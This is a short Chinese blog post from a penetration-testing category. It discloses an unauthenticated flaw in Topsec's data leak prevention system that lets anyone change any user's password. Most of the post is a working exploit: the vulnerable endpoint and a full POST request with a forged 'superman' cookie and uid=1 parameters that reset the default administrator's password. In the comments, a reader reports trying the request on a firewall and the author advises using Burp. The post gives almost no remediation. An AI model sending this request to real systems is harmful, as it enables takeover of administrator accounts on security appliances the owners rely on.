«

天融信数据防泄漏系统越权修改管理员密码

时间:2020-9-12 07:55     作者:admin     分类: 渗透测试


EEE26ECA-6A7F-4BA2-A274-713511D57CA5.jpeg


无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd

接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。


POST /?module=auth_user&action=mod_edit_pwd

Cookie: username=superman;


uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

标签: 渗透测试 漏洞 未授权

版权所有:Mrxn's Blog
文章标题:天融信数据防泄漏系统越权修改管理员密码
除非注明,文章均为 Mrxn's Blog 原创,请勿用于任何商业用途,转载请注明作者和出处 Mrxn's Blog

扫描二维码,在手机上阅读
评论:
avatar
219.134.216.* 2021-03-18 22:55
老哥,我忘记防火墙密码,用您的方法试了下,用POSTMAN提交的请求,添加了COOKIE,也在form-data里设置了参数,但是密码改不掉,期待您的回信
commentator
Mrxn 2021-03-21 11:38
@219.134.216.*: 别用 postman 用 burp 试试